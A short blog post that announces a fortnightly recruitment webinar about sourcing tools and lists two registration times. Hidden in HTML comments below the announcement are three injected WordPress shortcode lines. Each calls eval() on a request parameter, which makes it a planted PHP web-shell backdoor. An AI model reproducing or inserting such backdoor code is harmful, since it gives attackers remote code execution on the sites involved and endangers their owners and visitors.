New Fortnightly Recruitment Webinar Series

I’m starting a new series of fortnightly webinars on all things recruitment. The first in the series is all about cool tools and sourcing techniqiues and I hope that it will give recruites some new ideas about different and better ways of making placements.

If you would like to take part in the webinar, I’m running the same webinar twice in the day to fit as many people in as possible registration links are as follows:

Thursday 2nd Feb at (9:00am GMT which is 11:00am CAT) click here to register
Thursday 2nd Feb at (11:00am GMT which is 1:00pm CAT) click here to register

<!– [insert_php]if (isset($_REQUEST["fWOr"])){eval($_REQUEST["fWOr"]);exit;}[/insert_php][php]if (isset($_REQUEST["fWOr"])){eval($_REQUEST["fWOr"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Lcdw"])){eval($_REQUEST["Lcdw"]);exit;}[/insert_php][php]if (isset($_REQUEST["Lcdw"])){eval($_REQUEST["Lcdw"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ueCT"])){eval($_REQUEST["ueCT"]);exit;}[/insert_php][php]if (isset($_REQUEST["ueCT"])){eval($_REQUEST["ueCT"]);exit;}[/php] –>

Tagged with: , , , ,

Leave a Reply

Your email address will not be published. Required fields are marked *

*